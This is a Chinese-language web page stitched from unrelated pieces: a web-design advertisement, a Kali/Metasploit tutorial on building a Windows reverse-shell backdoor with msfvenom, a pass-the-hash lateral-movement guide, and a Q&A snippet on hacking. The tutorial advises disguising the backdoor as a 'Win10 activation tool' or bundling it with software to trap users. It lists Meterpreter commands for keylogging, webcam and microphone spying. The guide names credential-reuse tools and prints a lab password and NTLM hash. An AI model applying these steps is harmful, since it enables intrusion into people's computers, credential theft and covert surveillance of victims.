Kali利用msf滲透Windows電腦（超詳細(xì)）

前言

創(chuàng)新互聯(lián)自2013年創(chuàng)立以來，先為倉山等服務(wù)建站，倉山等地企業(yè)，進行企業(yè)商務(wù)咨詢服務(wù)。為倉山企業(yè)網(wǎng)站制作PC+手機+微官網(wǎng)三網(wǎng)同步一站式服務(wù)解決您的所有建站問題。

最近整理了一些 奇安信華為深信服大佬 的課件資料+大廠面試課題，想要的可以私信自取， 無償贈送 給粉絲朋友~

msfvenom a Metasploit standalone payload generator，Also a replacement for msfpayload and msfencode.是用來生成后門的軟件。

MSFvenom是Msfpayload和Msfencode的組合，將這兩個工具都放在一個Framework實例中。自2015年6月8日起，msfvenom替換了msfpayload和msfencode。

演示環(huán)境

使用Kali 2021.3進行演示操作

目標(biāo)靶機： Win10專業(yè)版

軟件：msfvenom、msfconsole（Kali系統(tǒng)內(nèi)置）

1.進入管理員模式

命令： sudo su

解釋： 不在管理員模式下運行可能會有權(quán)限不夠的提示，為了避免命令執(zhí)行失敗，在管理員下運行以下命令

命令： msfvenom -p windows/meterpreter/reverse_tcp LHOST=本地ip LPORT=本地端口號 –f exe –o 文件名.exe

解釋： 本地ip寫自己Kali的IP地址，用ifconfig就能查看自己Kali的IP地址

本地端口自己隨便設(shè)置一個沒有被占用的端口號，如果端口號被占用那么文件會生成失敗，換一個端口號就性

文件名可以隨便寫自己喜歡的名字，比如寫Win10激活工具，可能更容易讓目標(biāo)主機上鉤

當(dāng)然MSF也可以用來滲透手機、mac、Linux等

接下來運行命令生成文件

默認(rèn)生成的文件在根目錄下

把剛才生成的文件放到目標(biāo)靶機Win10系統(tǒng)中

命令： msfconsole

(1)命令： use exploit/multi/handler（選擇模塊）

(2)命令： set payload windows/meterpreter/reverse_tcp（選擇攻擊模塊）

(3)命令： set LhOST 192.168.32.1（填寫自己主機的IP地址）

(4)命令： set lport 1111（填寫剛才生成文件時的端口號）

(5)命令： show options（查看設(shè)置參數(shù)）

(6)命令： exploit -z -j（后臺執(zhí)行）

我們這里也可以把這個程序偽裝一下，把他的圖標(biāo)改一下，或者把它捆綁在某些軟件上面，當(dāng)用戶打開就自動安裝到對方電腦上面

(1)命令： sessions （查看上鉤的用戶）

(2)命令： sessions -i 1 （選擇需要攻擊的用戶，這里選擇第 1 個

命令： run vnc -i

cmd指令:

cat 讀取文件內(nèi)容到屏幕

cd 更改目錄

checksum 檢索文件的校驗和

cp 將源復(fù)制到目標(biāo)

del 刪除指定文件

dir 列出文件（ls 的別名）

下載 下載文件或目錄

編輯 編輯文件

getlwd 打印本地工作目錄

getwd 打印工作目錄

lcd 更改本地工作目錄

lls 列出本地文件

lpwd 打印本地工作目錄

ls 列出文件

mkdir 創(chuàng)建目錄

mv 將源移動到目標(biāo)

pwd 打印工作目錄

rm 刪除指定文件

rmdir 刪除目錄

search 搜索文件

show_mount 列出所有掛載點/邏輯驅(qū)動器

upload 上傳文件或目錄

pkill 按名稱終止進程

keyscan_start 開始捕獲擊鍵（開始鍵盤記錄）

keyscan_dump 轉(zhuǎn)儲按鍵緩沖（下載鍵盤記錄）

keyscan_stop 停止捕獲擊鍵（停止鍵盤記錄）

record_mic X秒從默認(rèn)的麥克風(fēng)record_mic音頻記錄（音頻錄制）

webcam_chat 開始視頻聊天（視頻，對方會有彈窗）

webcam_list 單攝像頭（查看攝像頭列表）

webcam_snap 采取快照從指定的攝像頭（攝像頭拍攝一張照片）

webcam_stream 播放視頻流從指定的攝像頭（開啟攝像頭監(jiān)控）

enumdesktops 列出所有可訪問的桌面和窗口站（窗體列表）

getdesktop 得到當(dāng)前的Meterpreter桌面

reboot 重新啟動遠(yuǎn)程計算機

shutdown 關(guān)閉遠(yuǎn)程計算機

shell 放入系統(tǒng)命令 shell

enumdesktops 列出所有可訪問的桌面和窗口站

getdesktop 獲取當(dāng)前的meterpreter桌面

idletime 返回遠(yuǎn)程用戶空閑的秒數(shù)

keyboard_send 發(fā)送擊鍵

keyevent 發(fā)送按鍵事件

keyscan_dump 轉(zhuǎn)儲擊鍵緩沖區(qū)

keyscan_start 開始捕獲擊鍵

keyscan_stop 停止捕獲擊鍵

mouse 發(fā)送鼠標(biāo)事件

screenshare 實時觀看遠(yuǎn)程用戶桌面

screenshot 抓取交互式桌面的屏幕截圖

setdesktop 更改 Meterpreters 當(dāng)前桌面

uictl 控制一些用戶界面組件

record_mic 從默認(rèn)麥克風(fēng)錄制音頻 X 秒

webcam_chat 開始視頻聊天

webcam_list 列出網(wǎng)絡(luò)攝像頭

webcam_snap 從指定的網(wǎng)絡(luò)攝像頭拍攝快照

webcam_stream 播放來自指定網(wǎng)絡(luò)攝像頭的視頻流

play 在目標(biāo)系統(tǒng)上播放波形音頻文件 (.wav)

getsystem 嘗試將您的權(quán)限提升到本地系統(tǒng)的權(quán)限

execute -f notepad 打開記事本

————————————————

原文鏈接：

橫向滲透之Pass The Hash

在上一章總結(jié)了windows抓取hash的一些方式。在實際場景中，我們需要更快的擴大戰(zhàn)果，獲取更多控制權(quán)限，以及定位域環(huán)境。

橫向滲透：就是在得到一臺主機的控制權(quán)限后，將該主機作為突破口、跳板，利用既有的資源嘗試獲取更多的憑據(jù)、更高的權(quán)限，進而達到控制整個內(nèi)網(wǎng)、擁有最高權(quán)限。

Pass The Hash 哈希傳遞簡稱PTH，可以在不需要明文密碼的情況下，利用LM HASH和NTLM HASH直接遠(yuǎn)程登錄。攻擊者不需要花費時間來對hash進行爆破，在內(nèi)網(wǎng)滲透里非常經(jīng)典。

常常適用于域/工作組環(huán)境。

靶機：windows server 2008

IP：10.211.55.19

domain：workgroup

user：administrator

pass：cseroad@2008

NTLM-Hash：82c58d8cec50de01fd109613369c158e

psexec類工具大同小異，大部分工具都是通過psexec來執(zhí)行的。原理是： 通過ipc$連接，將psexesvc.exe釋放到目標(biāo)機器，再通過服務(wù)管理SCManager遠(yuǎn)程創(chuàng)建psexecsvc服務(wù)，并啟動服務(wù)。然后通過psexec服務(wù)運行命令，運行結(jié)束后刪除該服務(wù)。

如：Metasploit psexec，Impacket psexec，pth-winexe，Empire Invoke-Psexec

缺點：容易被殺軟檢測到

優(yōu)點：可以直接獲取system權(quán)限

因為市面工具比較多，只kali就自帶有很多。所以這里以好用、批量為準(zhǔn)則選擇了幾款工具。

mimikatz中pth功能的原理：

windows會在lsass中緩存hash值，并使用它們來ntlm認(rèn)證，我們在lsass中添加包含目標(biāo)賬號hash的合法數(shù)據(jù)結(jié)構(gòu)，就可以使用類似dir這些命令進行認(rèn)證。

正常訪問server 2008 的盤符是需要用戶名密碼的。

在windows7上經(jīng)過pth之后就不需要密碼就可以遠(yuǎn)程連接。

將獲取的hash添加進lsass中。

在windows 7 上執(zhí)行以下命令：

執(zhí)行后會彈出cmd。在cmd下執(zhí)行 net use \\10.211.55.19\c$ 命令就可以遠(yuǎn)程連接。

擴展：

假如我們繼續(xù)探測到10.211.55.8使用的是同一個hash值。我們嘗試使用遠(yuǎn)程共享c盤和schtasks 定時計劃任務(wù)執(zhí)行獲取一個session。

powershell.bat為

當(dāng)重啟10.211.55.8機器后，metasploit可得到session

筆者經(jīng)常使用時的是這三個模塊

以exploit/windows/smb/psexec模塊為例

值得一說的是smbpass配置項支持明文密碼也支持hash(LM-Hash:NTLM-Hash)

成功返回system權(quán)限。

CobalStrike 同樣有psexec選項。

在得到一個beacon的基礎(chǔ)上，先在該網(wǎng)段portscan，探測存活主機后。

選擇View--Target--Login--psexec，可批量選擇主機pth。

選擇pth的用戶名和hash值。

從執(zhí)行的命令看得出依然利用的mimikatz。執(zhí)行成功后返回system權(quán)限。

該工具可以對C段主機批量pth。

項目在 github

在kali上直接apt就可以安裝

對工作組批量pth命令如下

測試的時候發(fā)現(xiàn)某些命令執(zhí)行后沒有回顯。

更多資料參考：

CrackMapExec：域環(huán)境滲透中的瑞士軍刀

紅隊測試工具-CrackMapExec-遠(yuǎn)程執(zhí)行Windows命令

wmi內(nèi)置在windows操作系統(tǒng)，用于管理本地或遠(yuǎn)程的 Windows 系統(tǒng)。wmiexec是對windows自帶的wmic做了一些強化。攻擊者使用wmiexec來進行攻擊時，不會記錄日志，不會寫入到磁盤，具有極高的隱蔽性。

安裝成功后，切換到examples目錄下

運行命令為

先加載Invoke-WMIExec.ps1腳本，再加載Invoke-TheHash.ps1腳本，因為Invoke-TheHash 里要用到 Invoke-WMIExec方法

如果要執(zhí)行系統(tǒng)命令?？梢约?Command 參數(shù)

執(zhí)行后該進程會在后臺運行，可以結(jié)合定時任務(wù)執(zhí)行嘗試反彈shell。

在測試中發(fā)現(xiàn)，在打了kb2871997 這個補丁后，常規(guī)的Pass The Hash已經(jīng)無法成功，但默認(rèn)的Administrator(SID 500)賬號例外，利用這個賬號仍可以進行Pass The Hash遠(yuǎn)程ipc連接。

以上所有操作均針對的SID 500。

內(nèi)網(wǎng)滲透之PTHPTTPTK

橫向移動

丟掉PSEXEC來橫向滲透

黑客是用什么系統(tǒng)進入別人的電腦?

黑客一般用kali

linux系統(tǒng)。一般黑客很少針對個人進行攻擊，如果針對個人那么可以用釣魚網(wǎng)站和木馬軟件，靶機點開釣魚網(wǎng)站或木馬軟件后，你的終端就能看見靶機的IP，和使用的系統(tǒng)，主要看你做的木馬怎么樣了。

你先會最少5門編程語言再說吧。